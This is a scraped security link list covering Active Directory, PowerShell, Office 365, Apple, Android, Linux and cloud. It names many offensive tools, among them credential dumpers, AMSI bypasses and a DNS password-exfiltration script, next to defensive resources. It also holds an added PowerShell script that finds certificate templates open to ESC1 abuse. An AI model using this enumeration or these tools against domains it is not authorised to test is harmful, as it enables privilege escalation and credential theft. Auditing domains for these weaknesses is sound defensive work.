Case Study: Password Analysis with BloodHound | |||
Introducing BloodHound 4.0: The Azure Update | |||
SharpHound3 | 520 | over 2 years ago | |
ATTACK MAPPING WITH BLOODHOUND | |||
aclpwn.py | 702 | about 3 years ago | : Active Directory ACL exploitation with BloodHound |
BloodHound.py | 1,940 | 4 months ago | : A Python based ingestor for BloodHound |
BloodHound-Tools | 440 | about 2 years ago | : Collection of tools that reflect the network dimension into Bloodhound's data |
CSIRT / Operating Systems / Windows | |||
Kerberos basics & (ab)use of Certificates within Active Directory (i.e. AD CS and PKINIT) |||
CSIRT / Operating Systems / Windows / Kerberos basics & (ab)use of Certificates within Active Directory (i.e. AD CS and PKINIT) | |||
Pass the Certificate | |||
UnPAC the hash | |||
Shadow Credentials | |||
Certificate Services (AD-CS) | |||
Certificate templates | |||
CA configuration | |||
Access controls | |||
Web endpoints | |||
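The certificate template and access control items above come together in the best-known AD CS misconfiguration: a published template on which the enrollee supplies the subject, that yields a certificate usable for client authentication, that needs neither manager approval nor an authorized signature, and on which a broad group holds the enrollment right. Such a certificate can be requested for any user and then used with PKINIT exactly as the "Pass the Certificate" entry describes. The PowerShell below is an added example, not code from the linked series or from Certipy: it queries the configuration partition over plain LDAP through ADSI as any domain user. The attribute names, flag bits, EKU OIDs and the Certificate-Enrollment right GUID are the documented AD CS schema values; the list of "low-privileged" groups is an assumption to adjust per environment.

```powershell
# Added example: report published certificate templates with the ESC1 combination.
$CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1   # bit in msPKI-Certificate-Name-Flag
$CT_FLAG_PEND_ALL_REQUESTS         = 0x2   # bit in msPKI-Enrollment-Flag (CA manager approval)
$ENROLL_RIGHT   = [Guid]'0e10c968-78fb-11d2-90d4-00c04f79dc55'   # Certificate-Enrollment extended right
$GENERIC_ALL    = [int][System.DirectoryServices.ActiveDirectoryRights]::GenericAll
$EXTENDED_RIGHT = [int][System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
$AuthEkus = '1.3.6.1.5.5.7.3.2',        # Client Authentication
            '1.3.6.1.4.1.311.20.2.2',   # Smart Card Logon
            '1.3.6.1.5.2.3.4',          # PKINIT Client Authentication
            '2.5.29.37.0'               # Any Purpose
$LowPrivGroups = 'Everyone', 'Authenticated Users', 'Domain Users', 'Domain Computers'  # assumption

function Search-Ldap([string]$Base, [string]$Filter) {
    $s = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$Base, $Filter)
    $s.PageSize = 500
    $s.FindAll()
}

function Get-IntAttr($props, [string]$attr) {
    if ($props[$attr].Count -gt 0) { [int]$props[$attr][0] } else { 0 }
}

function Get-Esc1Template {
    $configNc = [string]([ADSI]'LDAP://RootDSE').configurationNamingContext
    $pks = "CN=Public Key Services,CN=Services,$configNc"

    # A template is only enrollable when a CA publishes it (pKIEnrollmentService.certificateTemplates)
    $publishedOn = @{}
    foreach ($ca in Search-Ldap "LDAP://CN=Enrollment Services,$pks" '(objectClass=pKIEnrollmentService)') {
        $caName = [string]$ca.Properties['cn'][0]
        foreach ($t in $ca.Properties['certificatetemplates']) {
            $key = [string]$t
            if ($publishedOn.ContainsKey($key)) { $publishedOn[$key] += $caName } else { $publishedOn[$key] = @($caName) }
        }
    }

    foreach ($r in Search-Ldap "LDAP://CN=Certificate Templates,$pks" '(objectClass=pKICertificateTemplate)') {
        $p    = $r.Properties
        $name = [string]$p['cn'][0]
        if (-not $publishedOn.ContainsKey($name)) { continue }

        $ekus    = @($p['pkiextendedkeyusage'] | ForEach-Object { [string]$_ })
        $authEku = ($ekus.Count -eq 0) -or (@($ekus | Where-Object { $AuthEkus -contains $_ }).Count -gt 0)
        $suppliesSubject = ((Get-IntAttr $p 'mspki-certificate-name-flag') -band $CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) -ne 0
        $needsApproval   = ((Get-IntAttr $p 'mspki-enrollment-flag') -band $CT_FLAG_PEND_ALL_REQUESTS) -ne 0
        $needsSignature  = (Get-IntAttr $p 'mspki-ra-signature') -gt 0
        if ((-not $suppliesSubject) -or (-not $authEku) -or $needsApproval -or $needsSignature) { continue }

        # Who may enroll: the Certificate-Enrollment right, all extended rights (empty GUID) or GenericAll
        $enrollers = foreach ($ace in $r.GetDirectoryEntry().ObjectSecurity.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            $rights = [int]$ace.ActiveDirectoryRights
            $allRights   = ($rights -band $GENERIC_ALL) -eq $GENERIC_ALL
            $enrollRight = (($rights -band $EXTENDED_RIGHT) -ne 0) -and
                           ($ace.ObjectType -eq $ENROLL_RIGHT -or $ace.ObjectType -eq [Guid]::Empty)
            if ($allRights -or $enrollRight) { $ace.IdentityReference.Value }
        }
        $lowPriv = foreach ($id in $enrollers) {
            foreach ($g in $LowPrivGroups) { if ($id -eq $g -or $id -like "*\$g") { $id } }
        }

        [pscustomobject]@{
            Template      = $name
            PublishedOn   = ($publishedOn[$name] -join ', ')
            EKUs          = ($ekus -join ', ')
            LowPrivEnroll = (@($lowPriv | Select-Object -Unique) -join ', ')
        }
    }
}

Get-Esc1Template | Format-Table -AutoSize
```

A row with a non-empty LowPrivEnroll column is the ESC1 case; a row with that column empty still deserves attention, because whoever does hold the enrollment right on that template can mint authentication certificates for arbitrary principals. An empty EKU list is treated as "any purpose", which is how the CA interprets it.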
CSIRT / Operating Systems / Windows / Kerberos: | |||
Using Kerberos for Authentication Relay Attacks | |||
Kerberos Resource-Based Constrained Delegation | : When an Image Change Leads to a Privilege Escalation | ||
New-KrbtgtKeys.ps1 | 406 | 9 months ago | : This script will enable you to reset the krbtgt account password and related keys while minimizing the likelihood of Kerberos authentication issues being caused by the operation |
Kerberos cheatsheet | : A cheatsheet with commands that can be used to perform kerberos attacks | ||
CSIRT / Operating Systems / Windows | |||
Bypassing AD account lockout for a compromised account | |||
Azure AD and ADFS best practices | : Defending against password spray attacks | ||
NetNTLMtoSilverTicket | 763 | over 3 years ago | : SpoolSample -> Responder w/NetNTLM Downgrade -> NetNTLMv1 -> NTLM -> Kerberos Silver Ticket |
Domain Goodness | – How I Learned to LOVE AD Explorer | ||
windapsearch | 799 | over 2 years ago | : Python script to enumerate users, groups and computers from a Windows domain through LDAP queries |
LDAP Ping and Determining Your Machine’s Site | |||
Non-Admin NTLM Relaying & ETERNALBLUE Exploitation | |||
Active Directory administrative tier model | |||
Exchange-AD-Privesc | 728 | over 1 year ago | : Exchange privilege escalations to Active Directory |
Hunting for reconnaissance activities using LDAP search filters | |||
Faking an AD account password change is possible , but detectable. | |||
Building Free Active Directory Lab in Azure | Ethical Hacking Lessons — | ||
Configure the log analytics wizard | |||
Reset the krbtgt account password/keys | |||
GetNPUsers & Kerberos Pre-Auth Explained | |||
WinPwn | 3,336 | 10 months ago | : Automation for internal Windows penetration tests / AD security |
BadBlood | 2,047 | over 1 year ago | by @davidprowe, Secframe.com, fills a Microsoft Active Directory domain with a structure and thousands of objects. The output of the tool is a domain similar to a real-world domain. After BadBlood is run on a domain, security analysts and engineers can practice using tools to gain an understanding and prescribe to securing Active… |
Vulnerable-AD | 2,010 | 7 months ago | : Create a vulnerable active directory that's allowing you to test most of the active directory attacks in a local lab |
EXTRACTING PASSWORD HASHES FROM THE NTDS.DIT FILE | |||
Active-Directory-Exploitation-Cheat-Sheet | 5,669 | about 2 months ago | : A cheat sheet that contains common enumeration and attack methods for Windows Active Directory |
Active Directory Lab Setup Tool | : Active Directory Lab for Penetration Testing ||
Rubeus | 4,135 | 2 months ago | : is a C# toolset for raw Kerberos interaction and abuses |
Enabling Active Directory DNS query logging | |||
Detecting CVE-2020-1472 (CISA ED 20-04) Using Splunk Attack Range | |||
ADTimeline | 475 | 7 days ago | : Timeline of Active Directory changes with replication metadata |
Still Passing the Hash 15 Years Later | |||
Azure-Sentinel | 4,607 | 7 days ago | : Cloud-native SIEM for intelligent security analytics for your entire enterprise |
Detecting Abuse of Authentication Mechanisms | |||
Detecting the Elusive: Active Directory Threat Hunting | |||
Exporting AD FS certificates revisited: Tactics, Techniques and Procedures | |||
GPO Abuse: “You can’t see me” | |||
SERVER (UN)TRUST ACCOUNT | : Active Directory persistence through userAccountControl manipulation | ||
Active Directory Certificate Services (ADCS - PKI) domain admin vulnerability | |||
DSInternals | 1,654 | about 2 months ago | : Directory Services Internals (DSInternals) PowerShell Module and Framework |
Certipy | 2,418 | 3 months ago | is a Python tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS) |
Cobalt strike MANUALS_V2 | 94 | about 1 month ago | Increasing privileges and collecting information |
Active Directory (Attack & Defense ) | |||
Your Azure AD Connect server ... it's a Tier 0 asset | |||
Shooting Up: On-Prem to Cloud — Detecting “AADConnect” Creds Dump | |||
AADInternals | 1,302 | 10 days ago | : PowerShell module for administering Azure AD and Office 365 |
From Zero to Domain Admin | |||
Attacking Active Directory: 0 to 0.9 | |||
Offensive WMI - Active Directory Enumeration | Part , , and | ||
BloodyAD | 1,238 | 18 days ago | is an Active Directory Privilege Escalation Framework |
SID filter as security boundary between domains? (Part 7) - Trust account attack - from trusting to trusted | |||
KrbRelayUp | 1,529 | over 2 years ago | : a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced (the default setting) |
Harvesting Active Directory credentials via HTTP Request Smuggling | |||
Ping Castle Cloud | 145 | over 1 year ago | : Audit program for AzureAD |
Protection of privileged users and groups by Azure AD Restricted Management Administrative Units | |||
Active Directory Kill Chain Attack & Defense | 4,421 | 16 days ago | : This document was designed to be a useful, informational asset for those looking to understand the specific tactics, techniques, and procedures (TTPs) attackers leverage to compromise Active Directory, together with guidance on mitigation, detection, and prevention, and to understand the Active Directory Kill Chain attack and modern post-exploitation adversary tradecraft |
A little tool to play with Windows security | 19,466 | 5 months ago | |
Preventing Mimikatz Attacks – Blue Team – Medium | |||
pypykatz | 2,879 | about 1 month ago | : Mimikatz implementation in pure Python |
Walk-through Mimikatz sekurlsa module | |||
Mimikatz: Mitigating credential theft attacks | (pt-br) | ||
PERFORMING PASS-THE-HASH ATTACKS WITH MIMIKATZ | |||
SharpKatz | 974 | about 3 years ago | : Porting of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands |
Protecting RDP Passwords from Mimikatz Using Remote Credential Guard | |||
Updating Mimikatz in Metasploit | |||
Capturing Credentials with mimikatz | |||
Dumping User Passwords from Windows Memory with Mimikatz | |||
HandleKatz | 573 | about 2 years ago | : PIC lsass dumper using cloned handles |
CredentialDumping without Mimikatz | |||
Dumping Lsass Without Mimikatz | |||
PowerShell Gallery | |||
PowerShell Scripts | 443 | almost 7 years ago | : Collection of PowerShell scripts |
Example of Malicious DLL Injected in PowerShell | |||
POWERSHELL LOGGING: OBFUSCATION AND SOME NEW(ISH) BYPASSES PART 1 | |||
Empire | 4,258 | 11 days ago | : Empire is a PowerShell and Python 3.x post-exploitation framework |
Invisi-Shell | 1,105 | over 5 years ago | : Hide your PowerShell script in plain sight. Bypass all PowerShell security features |
DevSec Defense | How DevOps Practices Can Drive Detection Development For Defenders | ||
Chimera | 1,424 | about 3 years ago | : is a (shiny and very hack-ish) PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions |
Geeking out with UEFI, again | |||
PrivescCheck | 2,976 | 11 days ago | : Privilege Escalation Enumeration Script for Windows |
Stracciatella | 503 | about 2 years ago | : OpSec-safe PowerShell runspace from within C# (aka SharpPick) with AMSI, Constrained Language Mode and Script Block Logging disabled at startup |
Invoke-PSImage | 2,162 | about 5 years ago | : Embeds a PowerShell script in the pixels of a PNG file and generates a one-liner to execute it |
Invoke-TheHash | 1,480 | almost 6 years ago | : PowerShell Pass-The-Hash utils |
DeepBlueCLI | 2,190 | about 1 year ago | : DeepBlueCLI - a PowerShell Module for Threat Hunting via Windows Event Logs |
PowerShell Security: PowerShell Attack Tools, Mitigation, & Detection | |||
CheeseTools | 691 | over 3 years ago | : Self-developed tools for Lateral Movement/Code Execution |
Random | 260 | 3 months ago | : a lot of PowerShell scripts |
CredPhish | 285 | over 3 years ago | : is a PowerShell script designed to invoke legitimate credential prompts and exfiltrate passwords over DNS |
PowerShell Obfuscation | |||
powercat | 2,147 | 9 months ago | : netshell features, all in PowerShell version 2 |
PSByPassCLM | 375 | almost 3 years ago | : Bypass for PowerShell Constrained Language Mode |
Basic PowerShell for Pentesters | |||
Invoke-CradleCrafter | 822 | over 6 years ago | : PowerShell Remote Download Cradle Generator & Obfuscator |
LDAP Monitor | 839 | 5 months ago | : Monitor creation, deletion and changes to LDAP objects live during your pentest or system administration! |
Understanding and Bypassing AMSI | |||
Exploring PowerShell AMSI and Logging Evasion | |||
AMSI.fail | : generates obfuscated PowerShell snippets that break or disable AMSI for the current process | ||
INTRODUCTION TO SANDBOX EVASION AND AMSI BYPASSES | |||
PSBits | 3,207 | 9 days ago | : Simple (relatively) things allowing you to dig a bit deeper than usual |
Evading Detection: A Beginner's Guide to Obfuscation | 1,010 | 6 months ago | |
comsvcs MiniDump examples | |||
Beginning PowerShell Empire - Packet Analysis | |||
Detailed properties in the Office 365 audit log | |||
Office 365 Mail Forwarding Rules (and other Mail Rules too) | |||
Application Guard for Office (public preview) for admins | 957 | 4 days ago | |
o365spray | 771 | 17 days ago | : Username enumeration and password spraying tool aimed at Microsoft O365 |
AdminSubmissionsAPI scripts for URL and mail submission. | 10 | over 3 years ago | Admin Submission API allows submission of URLs, mail messages, file mail messages and files to Microsoft to re-scan and get newest verdict on submitted entity. Admin Submissions API is available both to Exchange Online Protection customers as well as to Office 365 ATP customers |
Commentator | 49 | about 7 years ago | : Commentator is a tool written in PowerShell to add a comment to the file properties of a Microsoft Office document (xlsx/m, docx/m, or pptx/m) |
Exploiting MFA Inconsistencies on Microsoft Services | . : A tool for checking if MFA is enabled on multiple Microsoft Services | ||
msoffcrypto-tool | 556 | 4 months ago | : Python tool and library for decrypting MS Office files with passwords or other keys |
pyxlsb2 | 19 | over 2 years ago | : an Excel 2007+ Binary Workbook (xlsb) parser for Python |
Making Clouds Rain :: Remote Code Execution in Microsoft Office 365 | |||
The worst of the two worlds: Excel meets Outlook | |||
Go365 | 621 | 8 months ago | : An Office365 User Attack Tool |
Microsoft-365-Defender-Hunting-Queries | 1,937 | almost 3 years ago | : Sample queries for Advanced hunting in Microsoft 365 Defender |
m365_groups_enum | 52 | over 3 years ago | : Enumerate Microsoft 365 Groups in a tenant with their metadata |
How to hunt for LDAP reconnaissance within M365 Defender? | |||
Stealing tokens, emails, files and more in Microsoft Teams through malicious tabs | |||
Reproducing The ProxyShell Pwn2Own Exploit | |||
ProxyLogon is Just the Tip of the Iceberg | : A Surface on Microsoft Exchange Server! | ||
PROXYTOKEN: AN AUTHENTICATION BYPASS IN MICROSOFT EXCHANGE SERVER | |||
How Default Permissions on Microsoft Power Apps Exposed Millions | |||
Excel Recipe: Some VBA Code with a Touch of Excel4 Macro | |||
An XML-Obfuscated Office Document (CVE-2021-40444) | |||
Simple Analysis Of A CVE-2021-40444 .docx Document | |||
cli-microsoft365 | 926 | 7 days ago | : Manage Microsoft 365 and SharePoint Framework projects on any platform |
There are multiple threat actors using OneDrive in campaigns, straight up just linking OneDrive. | |||
Advanced hunting queries for Microsoft 365 Defender | 1,937 | almost 3 years ago | : Sample queries for Advanced hunting in Microsoft 365 Defender |
All Your (d)Base Are Belong To Us, Part 2: Code Execution in Microsoft Office (CVE-2021–38646) | |||
MSSpray | 149 | almost 2 years ago | is used to conduct password spray attacks against Azure AD as well as validate the implementation of MFA on Azure and Office 365 endpoints |
Comparison of MOTW (Mark of the Web) propagation support of archiver software for Windows | 169 | 3 months ago | |
SnaffPoint | 239 | about 2 years ago | : A tool for pentesters to find candies in SharePoint |
CSIRT / Operating Systems / macOS/iOS | |||
Apple Open Source | and : security mirror | ||
Assembly | 559 | over 6 years ago | An iOS App In |
Having fun with macOS 1days | 121 | over 6 years ago | |
x18-leak | 83 | over 6 years ago | : iOS 11.2-11.2.6 kernel pointer disclosure introduced by Apple's Meltdown mitigation |
EmPyre | 867 | about 7 years ago | : A post-exploitation OS X/Linux agent written in Python 2.7 |
Apple Lightning (cont.) - serial number reading | Kanzi: It's a cable that's used by Apple's own engineers to debug various hardware (mainly iOS-devices, of course) with SWD (Serial Wire Debug - JTAG for ARM cores) - . : Set of tools to interact with various aspects of Kanzi probe and its derivatives | ||
SDQAnalyzer | 200 | 12 months ago | : a Saleae analyzer plugin for the SDQ (Apple Lightning, MagSafe, Battery) protocol |
Inside Code Signing | |||
jelbrekTime | 223 | about 6 years ago | : A developer jailbreak for Apple Watch S3 on watchOS 4.1 |
Disabling MacOS SIP via a VirtualBox kext Vulnerability | |||
mOSL | 225 | almost 4 years ago | : Bash script to audit and fix macOS High Sierra (10.13.x) security settings |
CSIRT / Operating Systems / macOS/iOS / Objective-See: | |||
DoNotDisturb | 294 | almost 4 years ago | : Detect Evil Maid Attacks |
sniffMK | 215 | almost 4 years ago | : sniff mouse and keyboard events |
Remote Mac Exploitation Via Custom URL Schemes | |||
The Mac Malware of 2018 | |||
CSIRT / Operating Systems / macOS/iOS | |||
KisMac2 | 901 | about 6 years ago | : KisMAC is a free, open source wireless stumbling and security tool for Mac OS X |
osx-security-awesome | 734 | 11 months ago | : A collection of OSX and iOS security resources |
threadexec | 80 | over 6 years ago | : A library to execute code in the context of other processes on iOS 11 |
Knowledge is Power! Using the macOS/iOS knowledgeC.db Database to Determine Precise User and Application Usage | |||
iOS12 Kernelcache Laundering | |||
kernelcache-laundering | 60 | about 6 years ago | : load iOS12 kernelcaches and PAC code in IDA |
Armor | 279 | about 1 year ago | : is a simple Bash script designed to create encrypted macOS payloads capable of evading antivirus scanners |
inject_trusts-iOS-v12.1.2-16C104-iPhone11,x.c | |||
opendrop | 8,709 | 5 months ago | : An open Apple AirDrop implementation written in Python |
A sample of the iOS malware | sha256:0d2ee9ade24163613772fdda201af985d852ab506e3d3e7f07fb3fa8b0853560 | ||
ipwndfu | 7,094 | 9 months ago | : open-source jailbreaking tool for older iOS devices |
Pair Locking your iPhone with Configurator 2 | |||
KTRW | : The journey to build a debuggable iPhone | ||
Privilege Escalation | macOS Malware & The Path to Root Part 2 | . : Random scripts for use in the Jamf Pro | ||
Dylib Hijacking | MacOS Red Teaming 211: | ||
iOS Application Injection | : Having been interested in jailbreaking iOS devices for going on almost a decade, mixing security and this makes sense. Within this entry, I document my method of checking if an application can have code injected | ||
The Mac Malware of 2019 👾 | : a comprehensive analysis of the year's new malware | ||
OSX.EvilQuest Uncovered | |||
Low-Level Process Hunting on macOS | |||
CVE-2020–9934: Bypassing TCC | ...for unauthorized access to sensitive user data! | ||
Attack Secure Boot of SEP | windknown@pangu | ||
Compromising the macOS Kernel through Safari by Chaining Six Vulnerabilities | 402 | over 3 years ago | |
Sinter | : New user-mode security enforcement for macOS | ||
Who put that in my Full Disk Access list? ssh and Mojave’s privacy protection | |||
macOS-Fortress | 422 | almost 3 years ago | : Firewall and Privatizing Proxy for Trackers, Attackers, Malware, Adware, and Spammers with Anti-Virus On-Demand and On-Access Scanning (PF, squid, privoxy, hphosts, dshield, emergingthreats, hostsfile, PAC file, clamav) |
From zero to tfp0 - Part 1: Prologue | |||
From zero to tfp0 - Part 2: A Walkthrough of the voucher_swap exploit | |||
We Hacked Apple for 3 Months: Here’s What We Found | , | ||
MACOS INJECTION VIA THIRD-PARTY FRAMEWORKS | |||
NetworkSniffer | 122 | over 1 year ago | : Log iOS network traffic without a proxy |
IPv6 security | |||
OpenHaystack | 8,572 | 5 months ago | : Build your own 'AirTags' label today! Framework for tracking personal Bluetooth devices via Apple's massive Find My network |
All Your Macs Are Belong To Us | : bypassing macOS's file quarantine, gatekeeper, and notarization requirements | ||
macOS Security Compliance Project | , | ||
Introducing | : macOS Initial Access Payload Generator | ||
Mythic-Macro-Generator | 44 | over 3 years ago | |
macOSTools | 261 | about 1 year ago | : macOS Offensive Tools |
TrueTree | 245 | 3 months ago | : A command line tool for pstree-like output on macOS with additional pid capturing capabilities |
Zero-Day TCC bypass discovered in XCSSET malware | |||
Dissecting the Apple M1 GPU, part I | and | ||
macos_shell_memory | 79 | over 3 years ago | : Execute MachO binaries in memory using CGo |
pwn-my | 647 | about 3 years ago | : iOS 14.5 WebKit/Safari based Jailbreak |
M1RACLES | : M1ssing Register Access Controls Leak EL0 State. CVE-2021-30747 is a covert channel vulnerability in the Apple Silicon “M1” chip | ||
Vulnerability Spotlight: A deep dive into macOS SMB server | |||
How to Use Kerberos on macOS | |||
Bypassing macOS TCC User Privacy Protections By Accident and Design | |||
Anecdotes About the macOS Sandbox File Limit | |||
SSD Advisory – macOS Finder RCE | : Find out how a vulnerability in macOS Finder system allows remote attackers to trick users into running arbitrary commands | ||
How malware gets into the App Store and why Apple can't stop that | |||
Quick Analysis for the SSID Format String Bug | |||
De Rebus Antiquis | : This article aims to explain how to exploit the recursive stack overflow bug in the iOS 7 bootchain. , , -> , iOS | ||
AirTag Scripts & Resources | 150 | 5 months ago | : AirTag instrumentation including AirTechno and firmware downgrades |
Pegasus ID | : After extensive research and understanding of how Pegasus Spyware is operating inside of iOS and AndroidOS systems I have created tools that will be able to identify & validate the presence of the spyware on your mobile devices, and tablets. Initial detection points were derived from the mvt-project | ||
UTM | : Securely run operating systems on your Mac | ||
qemu-t8030 | 1,998 | about 2 years ago | : iPhone 11 emulated on QEMU |
Dissecting TriangleDB, a Triangulation spyware implant | |||
kfd | 874 | 10 months ago | : short for kernel file descriptor, is a project to read and write kernel memory on Apple devices. Attacks: |
CSIRT / Mobile | |||
Today I make public ALL recordings and updated slides (+ FAQ) for my mobile security class, MOBISEC 2020! | |||
CSIRT / Mobile / Android | |||
android-security-awesome | 8,213 | 3 months ago | : A collection of android security related resources |
tip toeing past android 7’s network security configuration | |||
A Story About Three Bluetooth Vulnerabilities in Android | |||
Creating an Android Open Source Research Device on Your PC | |||
Droidefense | 473 | almost 2 years ago | : Advanced Android Malware Analysis Framework |
android-device-check | 83 | about 5 years ago | : Check Android device security settings |
Project Zero | : OATmeal on the Universal Cereal Bus: Exploiting Android phones over USB | ||
I'm looking at a Huawei P20 from China, let's see what I can find | |||
Tracking down the developer of Android adware affecting millions of users | |||
CLI tool to analyze APKs | 41 | 8 months ago | |
Breaking Samsung's Root of Trust: Exploiting Samsung S10 S-Boot | |||
TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices | 166 | over 4 years ago | |
Exploiting Android Messengers with WebRTC: Part 3 | |||
setools-android | 249 | about 7 years ago | : Unofficial port of setools to Android with additional sepolicy-inject utility included |
Security Guidelines | : OpenHarmony is an open OS that allows you to easily develop services and applications. It provides an execution environment to ensure security of application data and user data | ||
Proxying Android app traffic – Common issues / checklist | |||
Magisk | 48,721 | 12 days ago | : is a suite of open source software for customizing Android, supporting devices higher than Android 5.0 |
Magisk Trust User Certs | 1,770 | about 1 year ago | : A Magisk module that automatically adds user certificates to the system root CA store |
MagiskFrida | 949 | 8 days ago | : Run frida-server on boot with Magisk, always up-to-date |
Android-PIN-Bruteforce | 4,055 | about 1 year ago | : Unlock an Android phone (or device) by bruteforcing the lockscreen PIN. Turn your Kali Nethunter phone into a bruteforce PIN cracker for Android devices! (no root, no adb) |
Mobile Threat Catalogue | 143 | about 1 year ago | : NIST/NCCoE Mobile Threat Catalogue |
CiLocks | 2,313 | 8 months ago | : Crack interface lockscreen, Metasploit and more Android/iOS hacking |
mvt | 10,416 | 22 days ago | : MVT is a forensic tool to look for signs of infection in smartphone devices |
Oscorp evolves into UBEL: an advanced Android malware spreading across the globe | |||
Android Application Penetration Testing Checklist | |||
50 secrets codes on Android | |||
MobSecco | 77 | over 1 year ago | : Cloning apk for bypassing code tampering detection, Google Safety Net and scanning vulnerable plugins |
CSIRT / Mobile / Linux/ *Nix | |||
BCC | 20,577 | 8 days ago | : Tools for BPF-based Linux IO analysis, networking, monitoring, and more |
OpenSnitch is a GNU/Linux port of the Little Snitch application firewall | 10,932 | 16 days ago | |
Security Onion | 3,077 | over 3 years ago | : Linux distro for IDS, NSM, and Log Management |
Linux Kernel Defence Map | 1,777 | 5 months ago | |
wcc | 1,851 | about 1 month ago | : The Witchcraft Compiler Collection |
Ground Zero: Reverse Engineering | : | ||
CSIRT / Mobile / Linux/ *Nix / Ground Zero: Reverse Engineering | |||
Password Protected Reverse Shells – Linux x64 | Part 1-2: | ||
CSIRT / Mobile / Linux/ *Nix / Ground Zero: Reverse Engineering / Active Directory Dojo: | |||
Active Directory Penetration Dojo - Setup of AD Penetration Lab : Part 1 - ScriptDotSh | |||
Active Directory Penetration Dojo- Setup of AD Penetration Lab : Part 2 - ScriptDotSh | |||
Active Directory Penetration Dojo- Creation of Forest Trust: Part 3 - ScriptDotSh | |||
Active Directory Penetration Dojo – AD Environment Enumeration -1 - ScriptDotSh | |||
CSIRT / Mobile / Linux/ *Nix | |||
Dmesg under the hood | : Dmesg allows us to grasp what's going on under the hood when the kernel gets bad. Check out how dmesg is able to read kernel logs and show them to the user | ||
Randomize your MAC address using NetworkManager | |||
Shadow-Box | 184 | over 5 years ago | : Lightweight and Practical Kernel Protector for x86 (Presented at BlackHat Asia 2017/2018, beVX 2018 and HITBSecConf 2017) - and |
Privilege Escalation | : pentestbook | ||
A cache invalidation bug in Linux memory management | Project Zero: | ||
Announcing flickerfree boot for Fedora 29 | |||
The Linux Backdoor Attempt of 2003 | |||
Binary analysis on Linux | (PT-BR) | ||
GMER | : Rootkit Detector and Remover | ||
suprotect | 46 | about 6 years ago | : Changing memory protection in an arbitrary process |
A look at home routers, and a surprising bug in Linux/MIPS | |||
Hacking Tricks | (pt-br) : Privilege Escalation on Linux with Capabilities | ||
Basic Linux Privilege Escalation | : It's just a basic & rough guide | ||
Linux process infection (part I) | : Among the different tasks that a Red Team should carry out, there is one that is remarkable by its intrinsic craftsmanship: putting an APT inside a computer system and ensuring its persistence | ||
tpotce | 6,855 | 8 days ago | : T-Pot Universal Installer and ISO Creator |
Linux Privilege Escalation via LXD & Hijacked UNIX Socket Credentials | : LXD is a management API for dealing with LXC containers on Linux systems. It will perform tasks for any members of the local lxd group. It does not make an effort to match the permissions of the calling user to the function it is asked to perform | ||
Linuxprivchecker.py | 1,569 | almost 3 years ago | : A Linux Privilege Escalation Check Script |
Linux Kernel exploitation Tutorial. | 262 | over 4 years ago | |
ebpf_exporter | 2,200 | 21 days ago | : Prometheus exporter for custom eBPF metrics |
Zydra | 421 | 12 months ago | : is a file password recovery tool and Linux shadow file cracker. It uses dictionary search or brute-force methods for cracking passwords |
A gentle introduction to Linux Kernel fuzzing | - | ||
Teardown of a Failed Linux LTS Spectre Fix | : Today's blog will serve as a deep dive into a recent Spectre fix, one of dozens being manually applied to the upstream Linux kernel. We'll cover the full path this fix took, from its warning-inducing initial state to its correction upstream and then later brokenness when backported to all of the upstream Long Term Support (LTS) kernels | ||
Ropstar | 317 | over 1 year ago | : Automatic exploit generation for simple Linux pwn challenges |
Ken Thompson's Unix password | |||
Exploiting Wi-Fi Stack on Tesla Model S | |||
dlinject.py | 775 | over 2 years ago | : Inject a shared library (i.e. arbitrary code) into a live Linux process, without ptrace |
(Ab)using Kerberos from Linux | |||
LKRG | 415 | about 1 month ago | : Linux Kernel Runtime Guard |
Privilege Escalation via Python Library Hijacking | |||
Logging Passwords on Linux | |||
Kicksecure ™ | : A Security-hardened, Non-anonymous Linux Distribution | ||
Setuid Demystified | |||
ProcDump-for-Linux | 2,951 | 7 days ago | : A Linux version of the ProcDump Sysinternals tool |
OPNsense GUI, API and systems backend | 3,363 | 4 days ago | |
static-binaries | 3,183 | over 1 year ago | : Various *nix tools built as statically-linked binaries |
Traitor | 6,689 | 8 months ago | : Automatic Linux privesc via exploitation of low-hanging fruit e.g. gtfobins ⬆️ ☠️ |
ProcMon-for-Linux | 4,039 | 7 days ago | : is a Linux reimagining of the classic Procmon tool from the Sysinternals suite of tools for Windows. Procmon provides a convenient and efficient way for Linux developers to trace the syscall activity on the system |
OSWatcher | 58 | about 1 year ago | : A framework to track the evolution of Operating Systems over time |
Producing a trustworthy x86-based Linux appliance | |||
Running a quick NMAP scan to inventory my network | |||
Packet Strider | 253 | almost 4 years ago | : A network packet forensics tool for SSH |
telfhash | 102 | almost 3 years ago | (Trend Micro ELF Hash): Symbol hash for ELF files |
64-bit Linux stack smashing tutorial: Part 1 | |||
Hardening ELF binaries using Relocation Read-Only (RELRO) | |||
Linux Threat Report 2021 1H | |||
Learning Linux Kernel Exploitation - Part 1 | |||
Microsoft finds new elevation of privilege Linux vulnerability, Nimbuspwn | |||
So You Wanna Pwn The Kernel? | |||
SMB “Access is denied” caused by anti-NTLM relay protection | |||
CSIRT / Mobile / Cloud | |||
Scout Suite | 6,751 | 3 days ago | : Multi-Cloud Security Auditing Tool |
Cloud Security Research | 356 | over 4 years ago | : Cloud-related research releases from the Rhino Security Labs team |
gVisor | 15,851 | 6 days ago | : is an application kernel, written in Go, that implements a substantial portion of the Linux system surface |
PARSEC | 471 | 3 months ago | : Platform AbstRaction for SECurity service |
Cloud Security Alliance | : The Cloud Security Alliance (CSA) is the world’s leading organization dedicated to defining and raising awareness of best practices to help ensure a secure cloud computing environment | ||
CIS Controls Cloud Companion Guide | |||
CloudFail | 2,237 | 8 months ago | : Utilize misconfigured DNS and old database records to find hidden IPs behind the CloudFlare network |
HatCloud | 514 | over 1 year ago | (discontinued) |
Uncovering bad guys hiding behind CloudFlare | |||
CloudFlair | 2,618 | 5 months ago | : Find origin servers of websites behind CloudFlare by using Internet-wide scan data from Censys |
thsosrtl | 52 | over 10 years ago | : Repo for tools - cloud and vpn. : was originally thought of for attempting to resolve the true IP address of targets running through cloudflare |
Malicious Shell Script Steals Cloud Credentials | |||
